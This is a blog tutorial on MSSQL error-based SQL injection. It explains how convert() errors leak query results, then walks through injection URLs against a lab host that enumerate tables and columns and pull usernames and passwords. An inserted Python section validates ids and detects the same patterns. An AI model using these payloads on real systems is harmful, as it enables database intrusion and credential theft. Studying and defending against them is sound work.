Notes on Microsoft SQL Server error-based injection

saulGoodman


Introduction

Today I am sharing error-based SQL injection. Most online articles just list a template statement but do not explain why this function is used, or why using this function leads to an error-based SQL injection.

The convert() function: CONVERT() is a general function that converts a date to a new data type.

Syntax:

CONVERT(data_type(length),data_to_be_converted,style)
Notes:
data_type(length) is the target data type to convert to (with an optional length).
data_to_be_converted holds the value that needs to be converted.
style specifies the output format of the date/time.

Example:

CONVERT(VARCHAR(19),GETDATE())
CONVERT(VARCHAR(10),GETDATE(),110) 
CONVERT(VARCHAR(11),GETDATE(),106)
CONVERT(VARCHAR(24),GETDATE(),113)

Results look like:

Dec 29 2008 11:45 PM
12-29-2008
29 Dec 08
29 Dec 2008 16:25:46.635

Principle

For convert(int,@@version), the convert function first executes the SQL query given as its second parameter and then tries to convert the query result to the int type. Because the result of the SQL query is of varchar type, the specified conversion cannot be performed, so the convert function throws a SQL Server error message stating that "SQL query result" cannot be converted to type "int"; in this way the attacker obtains the result of the SQL query.

There are many functions that meet this condition:

convert() 
file_name() 
db_name() 
col_name() 
filegroup_name()
object_name() 
schema_name() 
type_name() 
cast()

Injection process

Basic information queries

convert(int,@@version)     get version information
convert(int,db_name())     database name
convert(int,user)          current user name
convert(int,@@SERVERNAME)  get information about the server host

Obtain version information

http://192.168.159.135:8080/get.aspx?id=convert(int,@@version)

Note that we put the function directly after id=, because the query id=1 is an integer (int) while the version information obtained by convert(int,@@version) is character type, so it produces an error that leaks the version information!

Or you can use this statement to achieve the same result:

http://192.168.159.135:8080/get.aspx?id=1 and 1=(convert(int,@@version))
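Both request forms above leak data only because a non-integer id reaches the query and the database error text is echoed back. The following is an added example, not code from the original article: it shows the server-side check that rejects anything but a plain integer id, and a small detector that applies the same check to request lines and names which of the article's conversion functions appears. The request lines are constructed for this example and are not real log data.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Functions whose failed varchar->int conversion leaks the query result in the
# SQL Server error message (the list given in the article).
ERROR_FUNCS = ("convert", "cast", "file_name", "db_name", "col_name",
               "filegroup_name", "object_name", "schema_name", "type_name")
FUNC_RE = re.compile(r"\b(" + "|".join(ERROR_FUNCS) + r")\s*\(", re.IGNORECASE)
# What a legitimate integer id looks like: optional sign, digits only.
INT_RE = re.compile(r"^-?\d{1,10}$")


def is_integer_id(value: str) -> bool:
    """Mitigation: accept the id only if it is a plain integer literal.
    Anything else (including 'convert(int,@@version)' or
    '1 and 1=(convert(...))') is rejected before a query is ever built."""
    return INT_RE.fullmatch(value.strip()) is not None


def flag_request(request_line: str) -> Optional[dict]:
    """Detection: inspect one 'GET /path?query ...' line.
    Returns a finding when the id parameter is not a plain integer, naming
    the first conversion function found in it (or None if none matched)."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    params = parse_qs(urlsplit(parts[1]).query, keep_blank_values=True)
    for name, values in params.items():
        if name.lower() != "id":
            continue
        for value in values:  # parse_qs has already URL-decoded the value
            if not is_integer_id(value):
                m = FUNC_RE.search(value)
                return {"param": name, "value": value,
                        "func": m.group(1).lower() if m else None}
    return None


# Constructed sample request lines (hypothetical traffic, not real logs).
SAMPLE_REQUESTS = [
    "GET /get.aspx?id=1 HTTP/1.1",
    "GET /get.aspx?id=convert(int,@@version) HTTP/1.1",
    "GET /get.aspx?id=1%20and%201=(convert(int,@@version)) HTTP/1.1",
    "GET /get.aspx?id=CONVERT(int,(select%20top%201%20table_name%20from%20information_schema.columns)) HTTP/1.1",
    "GET /get.aspx?id=-5 HTTP/1.1",
]


def scan(requests) -> list:
    """Return (request, finding) pairs for every flagged request."""
    return [(r, f) for r in requests if (f := flag_request(r)) is not None]
```

Rejecting a non-integer id at the application boundary removes the error path entirely; the detector is useful for reviewing historical web server logs for the same pattern.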

Get the table name of the current database

CONVERT(int,(select top 1 table_name from information_schema.columns))
http://192.168.159.135:8080/get.aspx?id=CONVERT(int,(select top 1 table_name from information_schema.columns))

The table name we get for the site's current database is: users!

Get the column names

convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(hex_encoded_table_name as varchar)))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273  as varchar)))

So we get the first column name: id!

To get the second column name, append a condition: and COLUMN_NAME != 'id'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id'))

So we get the second column name: username!

To get the third, and so on, append another condition: and COLUMN_NAME != 'username'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id' and COLUMN_NAME != 'username'))

So we get the third column name: password!

Retrieve data

From the steps above we obtained the site's table name: users, and its column names: id, username, password. Obviously the account and password are in the username and password columns, so we can now get the data:

convert(int,(select top 1 column_name from table_name))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users))

We get the first value of the username column: saul!

To get the second value in username, add a condition: where username!='saul'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users where username!='saul'))

This gets the second username value! To get the third, and so on, continue in the same way!

Now we have two usernames: saul and admin! So we go on to get their passwords!

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users))

The first value of the password column: saul520!

To get the next one, add a where condition: where password!='saul520'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users where password!='saul520'))

This gets the second password value!

That concludes MSSQL error-based injection!


Origin blog.csdn.net/weixin_46245322/article/details/105213367